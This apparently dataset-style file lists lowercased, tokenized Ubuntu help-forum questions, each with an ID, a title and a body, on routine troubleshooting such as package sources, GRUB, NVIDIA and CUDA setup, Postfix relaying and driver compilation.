163861	i have a misspelling in a repository source file , and it 's lousing up my ability to download	i just upgraded from ubuntu 10.10 to ubuntu 11.04 , and because of rebooting issues , i was downloading boot-repair using the live cd . i 've been able to get into 11.04 , but now i ca n't do any more upgrades . whenever i try to use the ubuntu software center , the synaptic package manager , or even the terminal , the following error message keeps coming up : e : type 'oot-repair/ubuntu ' is not known on line 3 in source list /etc/apt/sources.list.d/yannubuntu-boot-repair-maverick.list' of course , `` oot-repair '' is really `` boot-repair '' . i was able to locate /etc/apt/sources.list.d in the root directory and saw it with my own eyes , but i do n't know how to repair the misspelling . what should i do ?
163866	prevent unity dash from searching specific hard drive	i have a hard drive that is exclusively used for storage of music , pictures , movies and that sort of thing . it contains no system files . to conserve power and reduce noise , i have set it to spin down after a certain period of time has passed without any activity . the problem is that whenever i search for anything in the dash , the hard drive spins back up . i have tried to configure zeitgeist to not include the hard drive when recording activity [ 1 ] , but this policy does not seem to be respected . even though my entire music library is located on the hard drive , i can still search through it via the dash , even after deleting all history . how can i prevent the dash from accessing this hard drive entirely ? [ 1 ] in the 'files ' tab there is a box named `` do not record activity in the following folders '' . i have included the hard drive 's mount point here .
163867	how do i make grub appear at startup without holding shift ?	i have a dual boot windows 7 and ubuntu . whenever i start my computer it will go straight into linux unless i hold shift to go into grub . i am constantly having to change between operating systems and my keyboad configuration does n't allow for my to press shift at startup . is there a way i can make it go to grub even if the shift key is n't pressed ? thank you !
163871	access ubuntu through windows	i have a ubuntu server that i normally control through putty , but sometimes it dont want to boot up and then i cant use putty and have to move my monitor and keyboard to where my server is at and boot it up ( which is troublesome ) is there something i can use to access it through when it fails to boot up ?
163878	monodevelop .netframework 4 client profile problem	i have passed from windows to ubuntu 12.04 and i 'm happy for my choice . i have installed monodevelop because i am c # programmer and asp.net ( with mvc3 ) ... i got a solution from faculty , solution made in visual studio 2010 and i opened it in monodevelop . the solution opening is fine . when run the solution , the error occured : how to solve this problem ? i am beginner in ubuntu also in monodevelop . thank you for patience : d
163882	alias vs. function in bash scripts	i want to know the difference between aliases and functions in the bash shell - and when to use which one . it seems obvious that since functions can take arguments , they are a lot more powerful - since i work mainly on the road with a netbook and want to save energy and processing power , i would especially like to know a little more about what the performance differences of this two ways to extend bash functionality are .
163883	can not properly boot into ubuntu after installation of nvidiaâ driver	i 'm on ubuntu 12.04 . everything was fine until i did a fresh install of a proprietary driver for nvidia , using the `` additional drivers '' utility . after having restarted my computer , i can not access to my session as usual anymore . different things can happen : it starts under ubuntu gnu grub with linux 3.2.0-26-generic-pae , and it looks like a terminal , i can log in and all . startx gives me weird colored patterns on the screen and keeps frozen . it freezes immediately with the weird patterns , or with just a purple screen and my cursor after showing the `` ubuntu '' login purple screen . or it shows the usual login screen , but completely deformed , and unusable . i tried sudo dpkg-reconfigure nvidia-current to fix my problem , but it did n't work . could you help me please ?
163884	difference between gksudo and sudo ?	i have tiny script that i want it to run on start-up , but it needs sudo privileges so i use gksudo for the job . but it fails . ( it works correctly using sudo . ) is there any difference between sudo and gksudo beside the inteface ? btw : this is the tiny script i mentioned : # ! /bin/bash cat /sys/devices/platform/sony-laptop/kbd_backlight|if read state ; then \ echo $ ( ( 1- $ state ) ) | sudo tee /sys/devices/platform/sony-laptop/kbd_backlight ; fi ;
163888	why am i asked for my wireless password again and again despite settings to connect automatically ?	my wireless works fine , but from time to time , annoyingly enough , usually upon startup , it asks for the password , while at the same time displaying it underneath . so , i just have to click 'apply ' etc. , but at this point it tries to connect , and 80 % of times fails and comes back to the same message asking for the very password that 's there under my eyes . so , what is seemingly not doing at this point is proceeding with an automatic connection , which it is set to do and usually does , when this quirk does n't arises . after many attempts it would end up connecting but i am not waiting for that anymore for i have my solution : removing my connection from the 'edit connections / wireless ' list and putting the wireless back in manually . but i would like not to have to do it manually and avoid this altogether . i am in 12.04 , and my network hardware report in lshw is : description : wireless interface product : pro/wireless 2200bg [ calexico2 ] network connection vendor : intel corporation physical id : 4 bus info : pci @ 0000:02:04.0 logical name : eth1 version : 05 serial : 00:15:00:3b : d1:20 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ipw2200 driverversion=1.2.2kmprq firmware=abg:9.0.5.27 ( dec 12 2007 ) ip=192.168.0.12 latency=64 link=yes maxlatency=24 mingnt=3 multicast=yes wireless=ieee 802.11bg resources : irq:21 memory : c8400000-c8400fff
163889	system settings - > additional drivers is empty . how then do i install proprietary drivers ?	i use ubuntu 12.04 . my graphics card is geforce gt540m . i opened synaptic package manager and installed the following : nvidia-common nvidia-settings-update nvidia-common nvidia-current nvidia-current-updates the following were installed before ( when unity launcher looked normal ) : jockey-common psensor nvidia-settings jockey-gtk xserver-xorg-video-nouveau my intention was to use the right nvidia drivers . but apparently it did n't rightly install the drivers and now i have unity 2d running !
163894	start-up problems - some daemons not starting	this is a new installation of 12.04 and i can see that my machine is using both the old sysvinit method and the new upstart method to launch programs on start-up . according to the man page for service , upstart should run its stuff if it 's present , otherwise it falls back to sysvinit . now in /var/log/boot.log i have a bunch of errors where the daemons are n't starting , e.g . anacron : initctl : unknown job : s20anacron since the script you are attempting to invoke has been converted to an upstart job , you may also use the start ( 8 ) utility , e.g . start s20anacron rather than invoking init scripts through /etc/init.d , use the service ( 8 ) utility , e.g . service s20dbus start initctl : unknown job : s20dbus since the script you are attempting to invoke has been converted to an upstart job , you may also use the start ( 8 ) utility , e.g . start s20dbus rather than invoking init scripts through /etc/init.d , use the service ( 8 ) utility , e.g . service s20dmesg start initctl : unknown job : s20dmesg since the script you are attempting to invoke has been converted to an upstart job , you may also use the start ( 8 ) utility , e.g . start s20dmesg rather than invoking init scripts through /etc/init.d , use the service ( 8 ) utility , e.g . service s20hostname start initctl : unknown job : s20hostname since the script you are attempting to invoke has been converted to an upstart job , you may also use the start ( 8 ) utility , e.g . start s20hostname rather than invoking init scripts through /etc/init.d , use the service ( 8 ) utility , e.g . service s20hwclock start * stopping save kernel messages [ ok ] initctl : unknown job : s20hwclock since the script you are attempting to invoke has been converted to an upstart job , you may also use the start ( 8 ) utility , e.g . start s20hwclock rather than invoking init scripts through /etc/init.d , use the service ( 8 ) utility , e.g . service s20hwclock-save start * starting lightdm display manager [ ok ] initctl : unknown job : s20hwclock-save since the script you are attempting to invoke has been converted to an upstart job , you may also use the start ( 8 ) utility , e.g . start s20hwclock-save rather than invoking init scripts through /etc/init.d , use the service ( 8 ) utility , e.g . service s20network-interface start initctl : unknown job : s20network-interface since the script you are attempting to invoke has been converted to an upstart job , you may also use the start ( 8 ) utility , e.g . start s20network-interface rather than invoking init scripts through /etc/init.d , use the service ( 8 ) utility , e.g . service s20network-interface-container start * stopping anac ( h ) ronistic cron [ ok ] initctl : unknown job : s20network-interface-container since the script you are attempting to invoke has been converted to an upstart job , you may also use the start ( 8 ) utility , e.g . start s20network-interface-container i can see i 've got both /etc/init/anacron.conf and /etc/init.d/anacron along with /etc/rc2.d/s20anacron /etc/rc1.d/k20anacron /etc/rc3.d/s20anacron /etc/rc6.d/k20anacron /etc/rc5.d/s20anacron /etc/rc0.d/k20anacron /etc/rc4.d/s20anacron so i 'm confused here . did anacron and dbus and the rest launch successfully ? should i do something to take care of this 'unknown jobs ' problem ? it seems from my /var/log/syslog that i 've got some activity from anacron and dbus and so on - but i ca n't tell whether it 's enabled i 'd rather just see the logged message as for the other stuff : * starting isc dhcp ipv4 server [ ok ] i have a few more daemons to install - e.g . iptables and dnsmasq - so i 'd like to get this sorted in my mind before i continue . thanks
163898	xfce & docky & thunar - missing icon	im using xfce in combination with docky . but when i start thurnar via the filemanager-icon it opens ( ofc ) thurnar , but it has a wrong icon ( on the very right ) how to fix that ? normally , the filemanagericon should just be highlighted after starting a new program ( like with firefox . )
163900	ubuntu ( any version ) and 650m cuda	i 'm trying to get cuda working on ubuntu . i can install any flavor and version , but have begun with ubuntu 12.04 because i ca n't get the network set up with 11.04 . this question is similar : no cuda in ubuntu 12.04 ? and links to https : //sn0v.wordpress.com/2012/05/11/installing-cuda-on-ubuntu-12-04/ but that blog post appears ... incomplete . the author mentions in the comments below that his instructions above do n't work . here is what i have done : 0 ) installed ubuntu 12.04 64-bit on asus n56v with nvidia gt 650m 1 ) according to the official ubuntu docs here https : //help.ubuntu.com/community/binarydriverhowto/nvidia i should have `` additional drivers '' available , but i do not have any . 2 ) according to http : //www.nvidia.com/content/cuda/cuda-downloads.html this os version is not yet support . 3 ) how can i get nvidia cuda or opencl working on a laptop with nvidia discrete card/intel integrated graphics ? says cuda will work . bumblebee is needed to display with opengl . follow the instructions in step 4 ) to install bumblebee 4 ) try to follow the instructions here , which suggest using bumblebee : how well do laptops with nvidia optimus work ? sudo add-apt-repository ppa : ubuntu-x-swat/x-updates sudo add-apt-repository ppa : bumblebee/stable sudo apt-get update sudo apt-get install bumblebee bumblebee-nvidia optirun firefox & # hard reboot : ( it does n't reboot if glxspheres has been run once ... 5 ) back to ( 3 ) how can i get nvidia cuda or opencl working on a laptop with nvidia discrete card/intel integrated graphics ? get the 11.04 cuda code ( toolkit and sdk , not driver ) from http : //www.nvidia.com/content/cuda/cuda-downloads.html wget `` http : //developer.download.nvidia.com/compute/cuda/4_2/rel/toolkit/cudatoolkit_4.2.9_linux_64_ubuntu11.04.run '' wget `` http : //developer.download.nvidia.com/compute/cuda/4_2/rel/sdk/gpucomputingsdk_4.2.9_linux.run '' toolkit : sudo sh ./cudatoolkit_4.2.9_linux_64_ubuntu11.04.run then add the following two lines to .bashrc export ld_library_path=/usr/local/cuda/lib64 : /usr/local/cuda/lib : $ ld_library_path export path=/usr/local/cuda/bin : $ path sdk : sh gpucomputingsdk_4.2.9_linux.run # do n't run under sudo cd ~/nvidia_gpu_computing_sdk/c linkflags=-l/usr/lib/nvidia-current make -j lots of link errors ... 6 ) lets try pcl , the reason for all of this ... sudo add-apt-repository ppa : v-launchpad-jochen-sprickerhof-de/pcl sudo apt-get update sudo apt-get install libpcl-all sudo apt-get install libboost-dev libboost-mpi-dev libeigen3-dev libflann-dev libvtk5-dev libqhull-dev openni-dev sphinxbase-utils libsphinxbase-dev libsphinxbase1 cmake cmake-curses-gui libvtk5-qt4-dev libegl1-mesa libegl1-mesa-dev libegl1-mesa-drivers libgl1-mesa-glx libglew1.6-dev libglu1-mesa libglu1-mesa-dev svn co http : //svn.pointclouds.org/pcl/trunk pcl-trunk cd pcl-trunk ; mkdir build ; cd build cmake -dcuda_arch_bin=30 -dcmake_build_type=release .. make kinfu_app -j8 error : cuda driver version is insufficient for cuda runtime version /home/user/pcl-trunk/gpu/containers/src/initialization.cpp:76
163903	gaming performance difference between windows and ubuntu	what are the pros/cons switching from windows 7/8 to ubuntu ? i mainly develop software and play games . i obviously do n't play games on my laptop that 's why i give ubuntu a try . but the whole os looks great and i recently discovered playonlinux . how big is the performance hit from windows games ? what if the game supports dx11 and has tessellation , does playonlinux translate dx11 to opengl ?
163905	how do i access the maas web interface ?	i installed maas as the steps guided me but in the end i dont know how to access to maas web interface ? next steps now you have a working maas . you can log into the web interface at the following address , substitute the hostname for your machine of course : '' http : //hostname/maas '' this step.. i installed ubuntu 12.04 via vmware on my windows 7 . can anyone help how to access this step . and where to write this ? in my browser it says but when i write to my browser it doesnt opens .
163907	how do i configure wordpress to update automatically ?	i installed apache2 , mysql , php5 and phpmyadmin now i moved my old wordpress installtion from my htdocs folder under windows in my /var/www/ folder under ubuntu . now , when i want to update some of my plugins i have to put in the servername , username and password . that never happens under windows . under windows after clicking update , it automatically updated all without the need of typing the server and so on . what do i have to type in , so the update will take place normally ?
163908	could n't update ubuntu 8.04 , apt-get update fails	i am using ubuntu 8.04 and i want to update it , but it failed root @ ubuntu : ~ # apt-get update ign cdrom : //ubuntu 8.04.4 _hardy heron_ - release i386 ( 20100121.1 ) hardy/main translation-en_us ign cdrom : //ubuntu 8.04.4 _hardy heron_ - release i386 ( 20100121.1 ) hardy/restricted translation-en_us 37 % [ connecting to archive.ubuntu.com ( 91.189.91.25 ) ] [ connecting to security.u^37 % [ connecting to archive.ubuntu.com ( 91.189.91.25 ) ] [ connecting to security.u^37 % [ connecting to archive.ubuntu.com ( 91.189.91.25 ) ] [ connecting to security.ubuntu.com ( 91.189^err http : //security.ubuntu.com hardy-security release.gpg could not connect to security.ubuntu.com:80 ( 91.189.92.166 ) , connection timed out [ ip : 91.189.92.166 80 ] err http : //security.ubuntu.com hardy-security/main translation-en_us unable to connect to security.ubuntu.com http : [ ip : 91.189.92.166 80 ] err http : //security.ubuntu.com hardy-security/restricted translation-en_us unable to connect to security.ubuntu.com http : [ ip : 91.189.92.166 80 ] err http : //archive.ubuntu.com hardy release.gpg ^ [ [ 15~ could not connect to archive.ubuntu.com:80 ( 91.189.91.13 ) , connection timed out [ ip : 91.189.91.13 80 ] err http : //archive.ubuntu.com hardy/main translation-en_us unable to connect to archive.ubuntu.com http : [ ip : 91.189.91.13 80 ] err http : //archive.ubuntu.com hardy/restricted translation-en_us unable to connect to archive.ubuntu.com http : [ ip : 91.189.91.13 80 ] err http : //archive.ubuntu.com hardy-updates release.gpg unable to connect to archive.ubuntu.com http : [ ip : 91.189.91.13 80 ] err http : //archive.ubuntu.com hardy-updates/main translation-en_us unable to connect to archive.ubuntu.com http : [ ip : 91.189.91.13 80 ] err http : //archive.ubuntu.com hardy-updates/restricted translation-en_us unable to connect to archive.ubuntu.com http : [ ip : 91.189.91.13 80 ] reading package lists ... done w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/hardy/release.gpg could not connect to archive.ubuntu.com:80 ( 91.189.91.13 ) , connection timed out [ ip : 91.189.91.13 80 ] w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/hardy/main/i18n/translation-en_us.bz2 unable to connect to archive.ubuntu.com http : [ ip : 91.189.91.13 80 ] w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/hardy/restricted/i18n/translation-en_us.bz2 unable to connect to archive.ubuntu.com http : [ ip : 91.189.91.13 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/hardy-security/release.gpg could not connect to security.ubuntu.com:80 ( 91.189.92.166 ) , connection timed out [ ip : 91.189.92.166 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/hardy-security/main/i18n/translation-en_us.bz2 unable to connect to security.ubuntu.com http : [ ip : 91.189.92.166 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/hardy-security/restricted/i18n/translation-en_us.bz2 unable to connect to security.ubuntu.com http : [ ip : 91.189.92.166 80 ] w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/hardy-updates/release.gpg unable to connect to archive.ubuntu.com http : [ ip : 91.189.91.13 80 ] w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/hardy-updates/main/i18n/translation-en_us.bz2 unable to connect to archive.ubuntu.com http : [ ip : 91.189.91.13 80 ] w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/hardy-updates/restricted/i18n/translation-en_us.bz2 unable to connect to archive.ubuntu.com http : [ ip : 91.189.91.13 80 ] w : some index files failed to download , they have been ignored , or old ones used instead . w : you may want to run apt-get update to correct these problems root @ ubuntu : ~ # and my source.list file is : deb cdrom : [ ubuntu 8.04.4 _hardy heron_ - release i386 ( 20100121.1 ) ] / hardy main restricted deb http : //archive.ubuntu.com/ubuntu hardy main restricted deb-src http : //archive.ubuntu.com/ubuntu hardy main restricted deb http : //security.ubuntu.com/ubuntu hardy-security main restricted deb-src http : //security.ubuntu.com/ubuntu hardy-security main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //archive.ubuntu.com/ubuntu hardy-updates main restricted deb-src http : //archive.ubuntu.com/ubuntu hardy-updates main restricted # # uncomment the following two lines to add software from the 'universe' # # repository . # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # universe will not receive any review or updates from the ubuntu security # # team . # deb http : //archive.ubuntu.com/ubuntu hardy universe # deb-src http : //archive.ubuntu.com/ubuntu hardy universe # deb http : //archive.ubuntu.com/ubuntu hardy-updates universe # deb-src http : //archive.ubuntu.com/ubuntu hardy-updates universe # deb http : //archive.ubuntu.com/ubuntu hardy-security universe # deb-src http : //archive.ubuntu.com/ubuntu hardy-security universe i could n't solve this problem .
163910	how to get unity back after switching to gnome in ubuntu 12.04 ?	i have a problem with unity desktop . it was working fine until i switched and use gnome for about 30 minutes . when i switched back to unity , all i can see is the wallpaper and nothing else , no launcher and panel . i know its still working because when i right click , it shows the menu and i can even access the system setting via the change background option and the terminal via shortcut key . i believe its running fine its just that i ca n't do anything else because i ca n't see it on the desktop . any help ?
163920	vista to ubuntu 12.04 , no internet connectivity	i 'm new to linux . this is my first time downloading another operating system to anything . i was pleased when i saw ubuntu 's capabilities and downloaded the .iso at once to try the live cd . when trying out the live cd i noticed that i did n't have any internet connection , but i just assumed that you could n't use it while using the live cd . i installed ubuntu on my gateway vista laptop after trying out it 's features , rebooted , and logged in . my internet still does n't work , and i 've tried everything . i have a verizon router by actiontec , and i am assuming i need to install a new driver or firmware for it to work with the new operating system , or maybe i 'm way off . i just do n't know what else to do . any suggestions ?
163923	how to install ppstream on 12.04 ?	how do i install ppstream on 12.04 ? can someone give me a solution ? thank you ! when i type sudo apt-get install ppstream i got this error : conan51xd @ conan51xd-lenovo-b470 : ~ $ sudo apt-get install ppstream [ sudo ] password for conan51xd : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package ppstream conan51xd @ conan51xd-lenovo-b470 : ~ $
163930	how can i rename a folder using the terminal ?	i need to rename it in the terminal because it is in the root directory in lubuntu . i have a folder in /var/www/ which i need to change the name of from htdocs to xoops but i would not be able to do it by right clicking because i do n't have permissions . this is why i want to do it in the terminal so i can do it as root .
163938	how do i install my hp printer through network ?	when i plug the hp deskjet2050j510 printer directly on my pc through usb cable , it is perfect . but when trying through network , it can not find it . note i 'm using the hplip toolbox to search the printer . i also desactived the firewall . my internet box is supposed to allow such functionality , it is a livebox from orange ( france ) . here is the documentation , but for windows , not ubuntu my network installation is the following one : 2 pcs connected to the livebox and the printer connected by usb to the livebox too .
163939	how do i configure postfix starttls	i need to install postfix on my webserver couse i need to use sendmail for my website . i only need to send mail not recieve or relay . send with starttls ( port 587 ) via relay smtp.strato.de here is what happens jul 15 00:02:38 negrita postfix/smtp [ 7120 ] : host offered starttls : [ smtp.strato.de ] jul 15 00:02:38 negrita postfix/smtp [ 7120 ] : c717a181252 : to= < mt @ example.com > , relay=smtp.strato.de [ 81.169.145.133 ] :587 , delay=0.31 , delays=0.09/0/0.16/0.04 , dsn=5.7.0 , status=bounced ( host smtp.strato.de [ 81.169.145.133 ] said : 530 5.7.0 bitte konfigurieren sie ihr e-mailprogramm fuer authentifizierung am smtp server , wie auf www.strato.de/email-hilfe beschrieben . - please configure your mail client for using smtp server authentication ( in reply to mail from command ) ) jul 15 00:02:38 negrita postfix/cleanup [ 7118 ] : 29f5f181254 : message-id= < 20120714220238.29f5f181254 @ negrita > jul 15 00:02:38 negrita postfix/qmgr [ 7102 ] : 29f5f181254 : from= < > , size=2548 , nrcpt=1 ( queue active ) jul 15 00:02:38 negrita postfix/bounce [ 7121 ] : c717a181252 : sender non-delivery notification : 29f5f181254 jul 15 00:02:38 negrita postfix/qmgr [ 7102 ] : c717a181252 : removed jul 15 00:02:39 negrita postfix/local [ 7122 ] : 29f5f181254 : to= < michael @ negrita > , relay=local , delay=1.1 , delays=0.04/0/0/1.1 , dsn=2.0.0 , status=sent ( delivered to command : procmail -a `` $ extension '' ) jul 15 00:02:39 negrita postfix/qmgr [ 7102 ] : 29f5f181254 : removed jul 15 08:05:18 negrita postfix/master [ 1083 ] : daemon started -- version 2.9.1 , configuration /etc/postfix jul 15 08:05:29 negrita postfix/master [ 1083 ] : reload -- version 2.9.1 , configuration /etc/postfix and my config michael @ negrita : ~ $ postconf -n biff = no config_directory = /etc/postfix delay_warning_time = 4h home_mailbox = /home/michael/maildir/ html_directory = /usr/share/doc/postfix/html inet_interfaces = localhost mailbox_command = procmail -a `` $ extension '' mailbox_size_limit = 0 mydomain = example.com myhostname = negrita mynetworks = 127.0.0.0/8 [ : :ffff:127.0.0.0 ] /104 [ : :1 ] /128 notify_classes = resource , software , protocol readme_directory = /usr/share/doc/postfix recipient_delimiter = + relayhost = [ smtp.strato.de ] :587 smtp_sasl_password_maps = hash : /etc/postfix/sasl/passwd smtp_tls_enforce_peername = no smtp_tls_note_starttls_offer = yes smtp_tls_session_cache_database = btree : $ { data_directory } /smtp_scache smtpd_banner = $ myhostname esmtp $ mail_name ( ubuntu ) smtpd_sasl_auth_enable = yes smtpd_sasl_security_options = noanonymous smtpd_tls_cert_file = /etc/ssl/certs/ssl-cert-snakeoil.pem smtpd_tls_key_file = /etc/ssl/private/ssl-cert-snakeoil.key smtpd_tls_session_cache_database = btree : $ { data_directory } /smtpd_scache smtpd_use_tls = yes soft_bounce = yes the user and password is ok couse i can send mail with my thunderbird thanks in advance mike
163940	how to install rtl8187 driver on ubuntu 12.04	i tried to install this driver and keeps giving me errors i do n't understand ! ! here is the log on aircrack 's driver installation in file included from /home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211/ieee80211_softmac.c:17:0 : /home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211/ieee80211.h:986:24 : erreur : field ‘ps_task’ has incomplete type /home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211/ieee80211_softmac.c : in function ‘ieee80211_rx_frame_softmac_rtl7’ : /home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211/ieee80211_softmac.c:1512:3 : erreur : implicit declaration of function ‘tasklet_schedule’ [ -werror=implicit-function-declaration ] /home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211/ieee80211_softmac.c : in function ‘ieee80211_softmac_init_rtl7’ : /home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211/ieee80211_softmac.c:2229:2 : erreur : implicit declaration of function ‘tasklet_init’ [ -werror=implicit-function-declaration ] /home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211/ieee80211_softmac.c : in function ‘ieee80211_wpa_set_encryption_rtl7’ : /home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211/ieee80211_softmac.c:2474:3 : erreur : implicit declaration of function ‘request_module’ [ -werror=implicit-function-declaration ] /home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211/ieee80211_softmac.c:2503:3 : erreur : implicit declaration of function ‘try_module_get’ [ -werror=implicit-function-declaration ] /home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211/ieee80211_softmac.c : hors de toute fonction : /home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211/ieee80211_softmac.c:2648:1 : attention : la définition de données n'a pas de type ni de classe de stockage [ enabled by default ] /home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211/ieee80211_softmac.c:2648:1 : attention : type defaults to ‘int’ in declaration of ‘export_symbol’ [ -wimplicit-int ] /home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211/ieee80211_softmac.c:2648:1 : attention : noms de paramètres ( sans type ) dans la déclaration de fonction [ enabled by default ] /home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211/ieee80211_softmac.c:2649:1 : attention : la définition de données n'a pas de type ni de classe de stockage [ enabled by default ] /home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211/ieee80211_softmac.c:2649:1 : attention : type defaults to ‘int’ in declaration of ‘export_symbol’ [ -wimplicit-int ] /home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211/ieee80211_softmac.c:2649:1 : attention : noms de paramètres ( sans type ) dans la déclaration de fonction [ enabled by default ] /home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211/ieee80211_softmac.c:2650:1 : attention : la définition de données n'a pas de type ni de classe de stockage [ enabled by default ] /home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211/ieee80211_softmac.c:2650:1 : attention : type defaults to ‘int’ in declaration of ‘export_symbol’ [ -wimplicit-int ] /home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211/ieee80211_softmac.c:2650:1 : attention : noms de paramètres ( sans type ) dans la déclaration de fonction [ enabled by default ] /home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211/ieee80211_softmac.c:2651:1 : attention : la définition de données n'a pas de type ni de classe de stockage [ enabled by default ] /home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211/ieee80211_softmac.c:2651:1 : attention : type defaults to ‘int’ in declaration of ‘export_symbol’ [ -wimplicit-int ] /home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211/ieee80211_softmac.c:2651:1 : attention : noms de paramètres ( sans type ) dans la déclaration de fonction [ enabled by default ] /home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211/ieee80211_softmac.c:2652:1 : attention : la définition de données n'a pas de type ni de classe de stockage [ enabled by default ] /home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211/ieee80211_softmac.c:2652:1 : attention : type defaults to ‘int’ in declaration of ‘export_symbol’ [ -wimplicit-int ] /home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211/ieee80211_softmac.c:2652:1 : attention : noms de paramètres ( sans type ) dans la déclaration de fonction [ enabled by default ] /home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211/ieee80211_softmac.c:2653:1 : attention : la définition de données n'a pas de type ni de classe de stockage [ enabled by default ] /home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211/ieee80211_softmac.c:2653:1 : attention : type defaults to ‘int’ in declaration of ‘export_symbol’ [ -wimplicit-int ] /home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211/ieee80211_softmac.c:2653:1 : attention : noms de paramètres ( sans type ) dans la déclaration de fonction [ enabled by default ] /home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211/ieee80211_softmac.c:2654:1 : attention : la définition de données n'a pas de type ni de classe de stockage [ enabled by default ] /home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211/ieee80211_softmac.c:2654:1 : attention : type defaults to ‘int’ in declaration of ‘export_symbol’ [ -wimplicit-int ] /home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211/ieee80211_softmac.c:2654:1 : attention : noms de paramètres ( sans type ) dans la déclaration de fonction [ enabled by default ] /home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211/ieee80211_softmac.c:2655:1 : attention : la définition de données n'a pas de type ni de classe de stockage [ enabled by default ] /home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211/ieee80211_softmac.c:2655:1 : attention : type defaults to ‘int’ in declaration of ‘export_symbol’ [ -wimplicit-int ] /home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211/ieee80211_softmac.c:2655:1 : attention : noms de paramètres ( sans type ) dans la déclaration de fonction [ enabled by default ] /home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211/ieee80211_softmac.c:2656:1 : attention : la définition de données n'a pas de type ni de classe de stockage [ enabled by default ] /home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211/ieee80211_softmac.c:2656:1 : attention : type defaults to ‘int’ in declaration of ‘export_symbol’ [ -wimplicit-int ] /home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211/ieee80211_softmac.c:2656:1 : attention : noms de paramètres ( sans type ) dans la déclaration de fonction [ enabled by default ] /home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211/ieee80211_softmac.c:2657:1 : attention : la définition de données n'a pas de type ni de classe de stockage [ enabled by default ] /home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211/ieee80211_softmac.c:2657:1 : attention : type defaults to ‘int’ in declaration of ‘export_symbol’ [ -wimplicit-int ] /home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211/ieee80211_softmac.c:2657:1 : attention : noms de paramètres ( sans type ) dans la déclaration de fonction [ enabled by default ] cc1 : some warnings being treated as errors make [ 2 ] : *** [ /home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211/ieee80211_softmac.o ] erreur 1 make [ 1 ] : *** [ _module_/home/younes/rtl8187_linux_26.1010.0622.2006/ieee80211 ] erreur 2 make : *** [ modules ] erreur 2 i hope you help me guys i searched all over the internet and did n't find a working solution : (
163945	how to find large unwanted packages to uninstall to free space ?	my root partition is filling up . is there a tool or a good way to identify large packages or collections of interdependent packages that i could remove to free space ?
163951	how to upgrade/downgrade from 12.04 to 11.10	now this might sound stupid , but coming from 12.04 i would like to upgrade/downgrade to 11.10 . i ca n't do a fresh install because that would get rid of roughly 7gb of data i would have to download again . the upgrade option on the live cd wo n't be compatible with a future operating system , so i am just really stuck here . thanks in advance !
163960	searching for a filename without a certain string	so when you want to search for a file with a filename containing the string xyz from a directory to all depths , you write sudo find path -name '*xyz*' how do i find all files without the string xyz ?
163962	`` install alongside '' option missing . how do i install ubuntu beside windows using `` something else '' ?	whenever i startup from the linuxlive usb , and try to install ubuntu 12.04 , it only gives me two options instead of the usual 3 or 4 . my options are `` replace windows 7 with ubuntu '' and `` something else '' . whenever i go into `` something else '' , it looks extremely confusing . how do i install it side-by-side while using the `` something else '' section ? these are my partitions . /dev/sda /dev/sda1 ntfs ( 104mb , system required partition ) /dev/sda2 ntfs ( 1000097mb , windows 7 partition ) or should i try reinstalling my installer on a cd rather than usb and maybe then it will have the `` install alongside '' function ?
163967	how to install ubuntu in a windows 7 installed pc ?	how to install ubuntu in a windows 7 installed pc which had 4 partitions ? the hdd is about 320 gb in size and all partitions are ntfs . what i have to do ?
163970	can claws mail or sylpheed sync gmail contacts ?	i do n't mean importing manually , but true syncing ? if not , is there ubuntu software which syncs gmail contacts separately , and then the above clients sync from that ?
